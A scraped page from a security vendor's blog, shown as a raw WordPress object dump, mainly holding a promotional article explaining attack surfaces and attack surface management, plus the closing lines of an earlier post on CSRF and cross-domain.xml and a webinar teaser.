https://sethsec.blogspot.com/2014/03/exploiting-misconfigured-crossdomainxml.html is linked above for a Flash tutorial In my time researching I discovered a similar tool for this written by @IAmMandatory, you can find that here. [post_title] => Defeating CSRF Protections Through Expired cross-domain.xml Domains [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => defeating-csrf-protections-expired-cross-domain-xml-domains [to_ping] => [pinged] => [post_modified] => 2021-04-13 00:06:24 [post_modified_gmt] => 2021-04-13 00:06:24 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=6930 [menu_order] => 643 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) ) [post_count] => 22 [current_post] => -1 [before_loop] => 1 [in_the_loop] => [post] => WP_Post Object ( [ID] => 30089 [post_author] => 31 [post_date] => 2023-05-02 09:00:00 [post_date_gmt] => 2023-05-02 14:00:00 [post_content] =>

Unmanaged attack surfaces are increasingly becoming a pathway for threat actors to gain access to systems, making effective attack surface management (ASM) more critical than ever before.  

According to research from Enterprise Strategy Group (ESG), more than half of businesses surveyed (52 percent) say that security operations are more difficult today than they were two years ago. The top reasons respondents indicated for increased challenges include an evolving threat landscape and a changing attack surface.  

Given the sophistication of threats today, a comprehensive attack surface management strategy can help proactively identify gaps and vulnerabilities while strengthening security controls.  

Let’s start by breaking down what an attack surface is. 

What is an Attack Surface? 

An attack surface is an accumulation of all the different points of entry on the internet that a threat actor could exploit to access your external-facing assets, such as hardware, software, and cloud assets. 

An enterprise attack surface may include digital attack surfaces, such as:  

  1. Application attack surface 
  2. Internet of Things (IoT) attack surface 
  3. Kubernetes attack surface 
  4. Network attack surface 
  5. Software attack surface 
  6. Cloud attack surface 

Other types of enterprise attack surfaces include human attack surfaces and physical attack surfaces. 
 
In our connected environment, a company's total number of attack surfaces and overall digital footprint continues to expand, which puts external-facing assets at risk for exposures and vulnerabilities. 
 
Cloud storage adoption and hybrid work environments that rely on cloud solutions are some of the top reasons for expanded attack surfaces. Another factor is that an uptick in mergers and acquisitions can lead to acquiring assets that may be unknown, resulting in unmanaged attack surfaces. 

How Are Attack Vectors and Attack Surfaces Related?  

Attack vectors and attack surfaces are related because attack surfaces comprise all of the attack vectors, which include any method a threat actor can use to gain unauthorized access to an environment. Examples of attack vectors include ransomware, malware, phishing, internal threats, misconfiguration, and compromised credentials, among many others – vectors can also exist as a combination of these examples listed.  

As attack vectors become more complex, security teams need to identify and implement new, more effective solutions to secure attack surfaces and stay ahead of sophisticated threat actors.  

Monitoring and protecting against evolving attack vectors becomes more critical as an attack surface grows. For the purpose of this article, we’re focusing on how to effectively manage external attack surfaces since this is a common challenge many businesses face. The external attack surface remains a priority for remediation because it presents a higher risk due to its exposure to the internet. 

What is Attack Surface Management? 

Many businesses struggle to keep up with their ever-evolving attack surface. The good news is that ASM vendors equip internal teams with data-driven decisions to methodically tackle remediation efforts. 
 
Attack surface management provides continuous observability and risk assessment of your organization’s entire attack surface. When coupled effectively with continuous penetration testing, attack surface management helps companies improve their attack surface visibility, asset inventory, and understanding of their critical exposures. 

More specifically, external attack surface management (EASM) is the process of identifying and managing your organization’s attack surface, specifically from the outside-in view. The goal is to identify external assets that attackers could potentially leverage and discover exposures before malicious actors do.

Attack Surface Management Use-Cases 

Through the attack surface, adversaries can exploit exposures to identify vulnerabilities that will give them access to your organization. If threat actors are successful, then outcomes will vary depending on the attack surface and other factors—but they will undoubtedly be negative.  

Common outcomes include: 

  1. Deployment of malware on your network for the purposes of ransomware, or worse, killware. 
  2. Extraction of employee data such as social security numbers, healthcare data, and personal contact information. 

Effective asset management and change control processes are challenging, and even the most well-intentioned companies often see this as an area for improvement. The right attack surface management solution should include a combination of three core pillars: human expertise, continuous penetration testing, and prioritized exposures based on risk. 
 
Common reasons to invest in attack surface management include: 

  1. Continuous observability and risk management 
  2. Identification of external gaps in visibility 
  3. Discovery of known and unknown assets and Shadow IT 
  4. Risk-based vulnerability prioritization 
  5. Assessment of M&A and subsidiary risk 

Manage Growing Attack Surfaces with NetSPI 

NetSPI’s Attack Surface Management (ASM) platform helps security teams quickly discover and address vulnerabilities across growing attack surfaces before adversaries do.   
 
Four of the top five leading global cloud providers trust NetSPI for continuous threat and exposure management, leveraging our team, technology, and comprehensive methodology to detect known, unknown, and potentially vulnerable public-facing assets. 

Learn more about NetSPI’s attack surface management solutions or request a demo. Also check out our free Attack Surface Management Tool to search more than 800 million public records for potential attack surface exposures. 

[post_title] => Protect Your Growing Attack Surface in a Modern Environment [post_excerpt] => Attack surface management is critical to protecting an organization’s growing digital footprint in today’s connected environment. Learn how. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => protect-growing-attack-surface [to_ping] => [pinged] => [post_modified] => 2023-05-01 16:54:39 [post_modified_gmt] => 2023-05-01 21:54:39 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=30089 [menu_order] => 116 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [comment_count] => 0 [current_comment] => -1 [found_posts] => 22 [max_num_pages] => 0 [max_num_comment_pages] => 0 [is_single] => [is_preview] => [is_page] => [is_archive] => [is_date] => [is_year] => [is_month] => [is_day] => [is_time] => [is_author] => [is_category] => [is_tag] => [is_tax] => [is_search] => [is_feed] => [is_comment_feed] => [is_trackback] => [is_home] => 1 [is_privacy_policy] => [is_404] => [is_embed] => [is_paged] => [is_admin] => [is_attachment] => [is_singular] => [is_robots] => [is_favicon] => [is_posts_page] => [is_post_type_archive] => [query_vars_hash:WP_Query:private] => 29903397a23b324507405211ad3ccb13 [query_vars_changed:WP_Query:private] => [thumbnails_cached] => [allow_query_attachment_by_filename:protected] => [stopwords:WP_Query:private] => [compat_fields:WP_Query:private] => Array ( [0] => query_vars_hash [1] => query_vars_changed ) [compat_methods:WP_Query:private] => Array ( [0] => init_query_flags [1] => parse_tax_query ) )
Extreme Makeover AppSec Edition
Jake Reynolds

Discover how the NetSPI BAS solution helps organizations validate the efficacy of existing security controls and understand their Security Posture and Readiness.

X